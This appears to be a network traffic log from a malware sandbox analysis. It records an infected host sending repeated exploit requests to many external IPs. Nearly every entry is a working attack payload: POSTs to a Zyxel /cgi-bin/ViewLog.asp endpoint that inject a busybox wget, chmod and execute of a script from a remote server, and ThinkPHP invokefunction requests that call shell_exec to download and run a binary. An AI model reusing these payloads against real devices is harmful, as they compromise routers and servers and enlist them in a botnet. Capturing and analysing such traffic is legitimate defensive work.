                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:29.713609934 CET3787OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:45.583584070 CET5639OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:18.091367006 CET9680OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              430192.168.2.233340094.187.114.1808080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:10.568912029 CET8734OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              431192.168.2.235246894.120.145.2268080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:10.571367979 CET8734OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              432192.168.2.235883694.120.6.598080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:10.577986002 CET8735OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              433192.168.2.235717488.221.148.8380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:11.114639997 CET8833OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:11.410238028 CET8851INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:11 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:11 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 62 39 31 64 64 35 38 26 23 34 36 3b 31 36 39 39 39 31 30 33 35 31 26 23 34 36 3b 33 32 63 30 30 38 39 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3b91dd58&#46;1699910351&#46;32c0089e</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              434192.168.2.233754888.221.61.24880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:11.118993044 CET8834OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:11.419083118 CET8852INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:19:11 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:11 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 64 35 65 36 63 63 31 26 23 34 36 3b 31 36 39 39 39 31 30 33 35 31 26 23 34 36 3b 31 37 37 31 64 30 66 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;8d5e6cc1&#46;1699910351&#46;1771d0f1</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              435192.168.2.233474288.221.6.6580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:11.121299028 CET8835OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:11.423156977 CET8853INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:19:11 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:11 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 65 36 36 35 35 66 26 23 34 36 3b 31 36 39 39 39 31 30 33 35 31 26 23 34 36 3b 36 62 31 66 31 30 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;95e6655f&#46;1699910351&#46;6b1f106</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              436192.168.2.235601488.87.31.16180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:11.151815891 CET8836OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:11.486048937 CET8856INHTTP/1.0 400 Bad Request
                                                              Connection: Keep-Alive
                                                              Nov 13, 2023 22:19:11.486073017 CET8857INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                              Data Ascii: Keep-Alive: timeout=20Content-Type: text/html<h1>Bad Request</h1>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              437192.168.2.233752462.29.24.108080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:12.286531925 CET8958OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              438192.168.2.234553895.215.251.568080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:12.378628016 CET8959OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:12.865914106 CET8997INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              Transfer-Encoding: chunked


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              439192.168.2.234578494.121.25.98080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:12.628026009 CET8970OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              44192.168.2.234390431.136.144.1708080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:16.322608948 CET2074OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:17.331252098 CET2208OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:19.346966028 CET2462OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:23.570452929 CET2946OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:31.761327028 CET3991OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:47.887281895 CET5979OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:20.139055014 CET9915OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              440192.168.2.234523294.120.41.1008080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:12.628953934 CET8971OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              441192.168.2.235723294.122.217.1258080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:12.633215904 CET8972OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              442192.168.2.235780088.215.6.23080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:13.796066999 CET9119OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:14.097944021 CET9185INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:22:30 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              443192.168.2.235423488.221.142.22380
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:13.806205034 CET9120OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:19:14.121079922 CET9186INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 256
                                                              Expires: Mon, 13 Nov 2023 21:19:13 GMT
                                                              Date: Mon, 13 Nov 2023 21:19:13 GMT
                                                              Connection: close
